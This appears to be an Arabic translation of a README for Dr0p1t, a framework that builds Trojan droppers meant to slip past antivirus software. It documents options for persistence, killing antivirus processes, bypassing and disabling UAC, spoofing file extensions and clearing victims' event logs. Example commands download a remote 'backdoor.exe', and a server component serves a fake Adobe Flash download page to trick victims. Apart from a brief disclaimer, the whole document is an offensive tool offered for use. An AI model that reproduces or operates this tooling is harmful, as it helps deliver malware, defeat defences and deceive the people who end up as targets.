
إطار عمل يقوم بإنشاء أداة تحميل خفية متقدمة تتجاوز معظم برامج مكافحة الفيروسات وتحتوي على العديد من الحيل.
هل سمعت يومًا عن قاذفات أحصنة طروادة؟ باختصار، القاذف هو نوع من البرامج الضارة التي تقوم بتحميل برامج ضارة أخرى، ويمنحك Dr0p1t فرصة إنشاء قاذف خفي يتجاوز معظم برامج مكافحة الفيروسات ولديه الكثير من الحيل (ثق بي :D) ;)
+ خصائص الملف القابل للتنفيذ المُنشأ:
+ خصائص الإطار:
+ الوحدات:
+ وحدات الثبات:

لا يزال غير مختبر بالكامل! نحتاج إلى بعض المساهمين والمختبرين 😄
Usage: Dr0p1t.py Malware_Url [Options]
options:
-h, --help show this help message and exit
-s Add your malware to startup (Persistence)
-t Add your malware to task scheduler (Persistence)
-a Add your link to powershell user profile (Persistence)
-k Kill antivirus process before running your malware.
-b Run this batch script before running your malware. Check scripts folder
-p Run this powershell script before running your malware. Check scripts folder
-v Run this vbs script before running your malware. Check scripts folder
--runas Bypass UAC and run your malware as admin
--spoof Spoof the final file to an extension you choose.
--zip Tell Dr0p1t that the malware in the link is compressed as zip
--upx Use UPX to compress the final file.
--nouac Try to disable UAC on victim device
-i Use icon to the final file. Check icons folder.
--noclearevent Tell the framework to not clear the event logs on target machine after finish.
--nocompile Tell the framework to not compile the final file.
--only32 Download your malware for 32 bit devices only
--only64 Download your malware for 64 bit devices only
-q Stay quite ( no banner )
-u Check for updates
-nd Display less output information
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip
الإصدار الموصى به لبايثون 2 هو 2.7.x، والإصدار الموصى به لبايثون 3 هو 3.5.x ولا تستخدم 3.6 لأنه غير مدعوم بعد من قبل PyInstaller
ملاحظة: يجب أن يكون لديك صلاحيات الجذر
توجد قائمة هنا لجميع الفيديوهات الرسمية لتثبيت واستخدام Dr0p1t قائمة تشغيل
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py
cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py
ملاحظة: في بايثون 2.7 لا يوجد pip لذا ثبته أولاً من script get-pip.py [ابحث في جوجل]
ملاحظة: الخادم لا يزال في الإصدار التجريبي ولديه الكثير من الميزات التي سيتم إضافتها وأيضًا تصميم أفضل [نحتاج إلى مصمم للمساهمة :D]
على لينكس وويندوز الأمر نفسه بعد تثبيت Dr0p1t عن طريق اتباع الخطوات المذكورة أعلاه، قم بتثبيت الوحدات في ملف server_requirements.txt باستخدام pip كالتالي:
python -m pip install -r server_requirements.txt
الآن لنقم بتشغيل سكريبت الخادم الخاص بنا:
python Dr0p1t_Server.py
بعد تشغيل سكريبت الخادم، سيبدأ في الاستماع إلى جميع الاتصالات الواردة إلى المنفذ 5000 باستخدام flask.
الآن لاستخدام الخادم من جهازك، افتح في المتصفح 127.0.0.1:5000 أو [عنوان IP الخاص بك]:5000.
لفتحه من أجهزة أخرى في الشبكة المحلية، افتح [عنوان IP المحلي الخاص بك]:5000 ومن أجهزة أخرى في الشبكة الواسعة افتح [عنوان IP العام الخاص بك]:5000 ولكن تأكد أولاً من تكوين جهاز التوجيه لتوجيه اتصالات المنفذ 5000 إليك.
بعد فتح صفحة الخادم، سترى موقعًا بسيطًا بتصميم بسيط يطلب منك البيانات المطلوبة انظر لقطات شاشة الخادم
ثم أرسل البيانات، وسيتم التحقق منها عبر عدة عمليات ثم سيتم إنشاء ملف exe وسيتم إعادة توجيهك إلى صفحة تخبرك برابط الاحتيال.
بعد إدخال الرابط، سترى صفحة احتيال لتنزيل القاذف، وهي افتراضيًا صفحة تنزيل Adobe Flash. لاستبدال صفحة الاحتيال بصفحتك الخاصة، استبدل محتوى ملف "Scam.html" بمحتواك ولكن تذكر المتغيرات (لا تقم بإزالتها).

شاهد المزيد لويندوز شاهد المزيد للينكس

إذا كانت هذه الأداة مفيدة لك، فلا تتردد في شكري بشراء فنجان قهوة لي :)
إطار Dr0p1t غير مسؤول عن سوء الاستخدام أو الاستخدام لأغراض غير قانونية. استخدمه فقط لأغراض الاختبار الأمني أو التعليم!!!
يُقبل نسخ كود من هذا الإطار أو استخدامه في أداة أخرى طالما تذكر من أين حصلت عليه 😄
طلبات السحب مرحب بها دائمًا :D